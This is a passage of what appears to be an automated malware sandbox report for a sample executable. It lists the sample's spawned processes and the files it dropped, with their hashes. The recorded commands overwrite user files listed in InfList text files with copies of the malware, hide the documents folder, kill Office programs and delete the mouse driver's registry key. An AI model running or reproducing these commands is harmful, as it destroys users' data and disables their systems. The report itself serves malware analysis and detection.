wrote to memory of 2536 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2536 2896 cmd.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B36.tmp\9B37.tmp\9B38.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "3⤵PID:2356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""3⤵PID:2376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "3⤵PID:956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""3⤵PID:1440
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "3⤵PID:2656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""3⤵
- Drops file in Program Files directory
- Drops file in Windows directory
PID:2664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "3⤵PID:2528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:2536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "3⤵PID:2964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""3⤵PID:2560
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\my documents"3⤵
- Views/modifies file attributes
PID:1012 -
C:\Windows\system32\tskill.exetskill WINWORD3⤵PID:2488
-
C:\Windows\system32\tskill.exetskill excel3⤵PID:2468
-
C:\Windows\system32\tskill.exetskill msaccess3⤵PID:2104
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K crash.bat3⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:588
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8FC1.tmp\8FC2.tmp\8FC3.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:828
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:776
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\952E.tmp\952F.tmp\9530.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1336
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2920
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1204
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9897.tmp\9898.tmp\9899.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1700
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1872
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1028
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9231.tmp\9232.tmp\9233.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1172
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2968
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98A7.tmp\98A8.tmp\98A9.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2252
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1160
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2780
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8FD1.tmp\8FD2.tmp\8FD3.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:936
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1432
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B17.tmp\9B18.tmp\9B29.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:1572
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1728
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:108
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:572
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9E04.tmp\9E05.tmp\9E06.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1440
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9CCD.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:768
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1620
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9CCC.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1828
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:764
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B07.tmp\9B08.tmp\9B09.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2576
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2688
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2420
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A9A.tmp\9A9B.tmp\9A9C.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2240
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:1372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2348
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A9B.tmp\9AAB.tmp\9AAC.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2888
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:1724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2600
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1924
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98C7.tmp\98C7.tmp\98D8.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2024
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:156
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2428
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98C6.tmp\98C7.tmp\98C8.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2588
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9CCE.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1784
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2536
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2664
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2760
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9C7E.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1580
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98E5.tmp\98E6.tmp\98E7.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2244
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:908
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2380
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"3⤵PID:2776
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD590ff70f2778f116069b3d3a6cc0ab36e
SHA102a2f1a86ebb33a06f0392c365bea6e283e65ea0
SHA25624581f8d20043f2cfc2ca639054813a59181cb284af37872dc9578b837ec4b24
SHA512bcecb81121f8f7f29a50c79b01718bd92dda6054a55ab5ef440181b24352c973355d3bf4f0a780dc8fa5b22798dbe35b789933062dfa6385d8fc22721b36b725
-
Filesize
583B
MD594c867dd980e74cd1ef3647dfdea5197
SHA12da42c0e5cf71e64a4584a4658f8f5805d87e8f7
SHA25661acd282298d14dc3c669bb84ee2c979d4f10bb18aab2a7bc4560a04e89e6955
SHA512309ffa70e59173f961c9a035c9e5156f4d6c674a4d7bb8b08c406a4a1aab5ad0022784c5777c4885320d1d56ee1cbad0b1f568a2e06ed412eb96751ccf74e0ce
-
Filesize
5.5MB
MD57a12bca81dc4f15d15f3c2b678ea2f56
SHA1c14221d78f6355389ce368ecbce118abd8e69242
SHA25643c89d7cf5da562459e64624b16165ea6c54a012ef8c1dc7fe827f6b79d0efad
SHA512aed9c5c804e4f379886054879207bbee11446a6044953ddd09b082c21d46a3ebe8b9b1bf5b8fcb3bb5ea5a76a92e1de9f912ebc77324b815b51df8067b067789
-
Filesize
496B
MD52ca936d467fc31fa35d9bb9b8ca18e1e
SHA1f3bd37d01e249cfeecd218794398c13c9579760c
SHA25688bf98e5a44cdc740ff6a1ada71ec356184d85f5f953b0b1b94ec514456a11a2
SHA512498ef89cec5ebd9d80f03b4977d4c624e7741f7d638cd95f3a9a91ae84058fcc9001b4d42ed38d616580730a4d95d8dd832c1bc83b3751c758aabab52961b8ff
-
Filesize
5.5MB
MD5d800e2b4dcf36e361ba0f904941ba3c2
SHA12424a79f8d17e8e63b807dc890fc6afbda63ca93
SHA256dc993d35632ddb022f501f9200c0c0a44eeb78fb7883b9333505cd862cb9041a
SHA5124cf7a8c60e4c34e8201cf276b2149461b99dc59a3d4c159213156f90afe269ef3a7b254a3feb05f63189d54a88666970e4b5f1bae202ef08fcff4c6c111c2234
-
Filesize
656B
MD5c2208d675e7a7259fe1fd6abc5d7d5da
SHA1a7fced8df2ca662452c5a119962376e67ad4daf7
SHA2566600c8d3eb9b6af013830c9093ef653bf18d506876a2a6f345a907db51c59f25
SHA512a4271041b047825f63c91b177d931a8e8714ce6ad27c800c1a82f621666199e496d8ee897ebbdb82c28eb8788b984dac5dd86b742b2a93fbc909cb9f7b03e29d
-
Filesize
243KB
MD5b75a38704e0d721296204659559bdcd0
SHA117de9a7aec8a9f96e425c51079a0f95456cf4757
SHA25618ba5e292803a61b5d9137b696f7e3396ee3f233aa72b7f05fa30e3b36c4b612
SHA51222ff082aadb54949904cc88904be2398b8914f45d60e44d46db67b3ef37c6859741fdb6f418381ade9723ff0d7eb79fdb8ca9d3998b74a4ea6944f2eac454843
-
Filesize
5.4MB
MD506346a23b034e63e24db9c0ff8727a29
SHA1936490e5aac34865ce87ba0a9467195518b66401
SHA2562e93f59b4a70b104ff4176cae6c8643f36dee9618c350f0a9881622154ff7564
SHA512da46ca58c6d69794d2d62e4258738fd0bbecceca4dbb9a80cc8f2bd326493532724a497639c1b64b5923d4b20383ec88fc9fe95c7bf1bbd05d05313860bbd467
-
Filesize
262KB
MD5ee05552702792e7fa38befe5b6c768e5
SHA1206595102fdd042aacc8266a2765dd60bf5bc5a8
SHA2567e12b0748478abc06e68a95da4b7c6979ff3ade5f70682ab9a405a5a8bb00bc2
SHA5120f2566a74633465cbd3125327904361170ca029dd46413a59452d47fbfa8a2c8f77d280c866112ca0a23ae696ae26af0910d0bb8fbc3cb4dd373bb73b0789862
-
Filesize
1KB
MD5f36af8d6619b227a9f45e488c89d9f94
SHA19f948b6330b9484094b0844ab97b5b57b6ea908f
SHA2568802385d9da5ccb6f3e85b4d1a96ec319b2a64243f39add263b955862198c662
SHA5124eeb68da0c458cdeb78d24dea11d21de438ad3f8b368f609fef5adb48b7da9629cabc2990e9be5e678fccb622641f9faac0491b6475466310244b926250c9580
-
Filesize
4.8MB
MD5a6e3a62cb30ad13a91adac893b028a3c
SHA1b7612e776b1182defec734db98799e114d8b68a3
SHA2569a6f2a74b45b212ca6aa4b5a98a9341f33add5ae11242bd8787eb5f2eecf91f3
SHA51246717739da5ed20f504376baa6cfa3d58596252612e832cc9dac50e5e4b939104197c0afe3499720ee608d2741f4f428ef66c52b9df8221d9844f021b88b4588
-
Filesize
4.6MB
MD5024098091943a6fe05be94f83215575b
SHA107fb7c9714829a66a5db2b44a7cf61f9652bef1c
SHA2565e71b82d767f0e562b3129136ccd5cb47c856e6fd9c4e2f1b4ebf2203f8c63d3
SHA512f5d27ff55abd3198fff0d2761796abd453a3211ee8278db91417041650108326f501139256c1a548a489837204f59d2910935899576ffb29fd8d273a043e056d
-
Filesize
2.6MB
MD5442f0b43fa5834e2c9f67963988ba2d2
SHA11042b955b26cb6a4bd29ffaa8306f80760f2a690
SHA256edc95be193831e4128ca9bb04e091e18912cef5b26a58849ef6b0b3a4a7f5647
SHA512cfb543d2ade97325cdb6b4dd68d7bf12d978346fb6eff63beedd202fbc2e157918ee5d0eec1d1eea2d0e556ef5ff23abd1bc131a5e15bdb705a387b7cc980810
-
Filesize
832KB
MD5381dacd4e8b80b52d8098afd23717a25
SHA1332e922130a32c9f7fce35370d1ea061580ed90c
SHA2562d5b5473fa1ce6fa01b06684bdacdc3487ab83174be5baa800ddd363432a0b76
